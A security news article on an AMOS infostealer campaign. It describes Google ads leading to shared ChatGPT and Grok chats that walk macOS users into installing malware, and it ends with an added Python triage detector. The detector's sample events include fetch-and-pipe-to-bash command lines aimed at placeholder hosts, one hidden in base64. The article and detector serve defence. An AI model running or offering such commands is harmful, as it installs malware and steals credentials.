Google Ads for Shared ChatGPT, Grok Guides Push macOS Infostealer...
A new AMOS infostealer campaign is abusing Google search ads to lure users into Grok and ChatGPT conversations that appear to offer “helpful” instructions but ultimately lead to installing the AMOS info-stealing malware on macOS.
The campaign was first spotted yesterday by researchers at cybersecurity company Kaspersky, while managed security platform Huntress published a more detailed report earlier today.
The ClickFix attack begins with victims searching for macOS-related terms, such as maintenance or troubleshooting questions, or for Atlas, OpenAI's AI-powered web browser for macOS.
The Google advertisements link directly to ChatGPT and Grok conversations that had been publicly shared in preparation for the attack. The chats are hosted on the legitimate LLM platforms and contain the malicious instructions used to install the malware.
"During our investigation, the Huntress team reproduced these poisoned results across multiple variations of the same question, 'how to clear data on iMac,' 'clear system data on iMac,' 'free up storage on Mac,' confirming this isn't an isolated result but a deliberate, widespread poisoning campaign targeting common troubleshooting queries," Huntress researchers explain.
If users fall for the trick and execute the commands from the AI chat in the macOS Terminal, a base64-encoded URL decodes to a bash script (named update) that displays a fake password prompt dialog.
When the password is provided, the script validates it, stores it, and uses it to execute privileged commands, such as downloading the AMOS infostealer and running the malware with root-level privileges.
AMOS was first documented in April 2023. It is a malware-as-a-service (MaaS) operation that rents the infostealer for $1,000/month, targeting macOS systems exclusively.
Earlier this year, AMOS added a backdoor module that lets operators execute commands on infected hosts, log keystrokes, and drop additional payloads.
AMOS is dropped on /Users/$USER/ as a hidden file (.helper). When launched, it scans the applications folder for Ledger Wallet and Trezor Suite. If found, it overwrites them with trojanized versions that prompt the victim to enter their seed phrase "for security" reasons.
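The two observable stages described above, a base64-encoded URL fed to a shell from the Terminal and a hidden .helper file under /Users, can be triaged from endpoint process-event command lines. The following is an added example written for this article, not code from BleepingComputer, Huntress or Kaspersky; the sample events and the example.invalid URL are constructed placeholders.

```python
import base64
import re

# Constructed sample process-event command lines (not from the article).
# The base64 blob in the first line encodes the placeholder "https://example.invalid/update".
SAMPLE_EVENTS = [
    "echo aHR0cHM6Ly9leGFtcGxlLmludmFsaWQvdXBkYXRl | base64 -d | xargs curl -fsSL | bash",
    "curl -s https://updates.example.invalid/update -o /tmp/update && bash /tmp/update",
    "ls -la /Users/alice/.helper",
    "git log --oneline -n 5",
]

B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")          # candidate base64 blobs
SHELL_SINK = re.compile(r"\|\s*(ba|z)?sh\b|\b(ba|z)?sh\s+(/tmp|\$TMPDIR|~|/Users)")
HIDDEN_HELPER = re.compile(r"/Users/[^/\s]+/\.helper\b")     # AMOS drop path from the article


def decoded_urls(cmdline):
    """Return every base64 token in the command line that decodes to an http(s) URL."""
    urls = []
    for tok in B64_TOKEN.findall(cmdline):
        try:
            text = base64.b64decode(tok, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # not valid base64, or not text: ignore
        if re.match(r"https?://", text):
            urls.append(text)
    return urls


def triage(cmdline):
    """Return a list of human-readable reasons this command line matches the ClickFix chain."""
    reasons = []
    urls = decoded_urls(cmdline)
    piped_to_shell = bool(SHELL_SINK.search(cmdline))
    if urls and piped_to_shell:
        reasons.append("base64-encoded URL executed via shell: " + urls[0])
    elif urls:
        reasons.append("base64-encoded URL in command line")
    if "curl" in cmdline and piped_to_shell:
        reasons.append("remote content fetched and passed to shell")
    if HIDDEN_HELPER.search(cmdline):
        reasons.append("reference to hidden ~/.helper file")
    return reasons


if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        print(event, "->", triage(event) or "clean")
```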
Source: BleepingComputer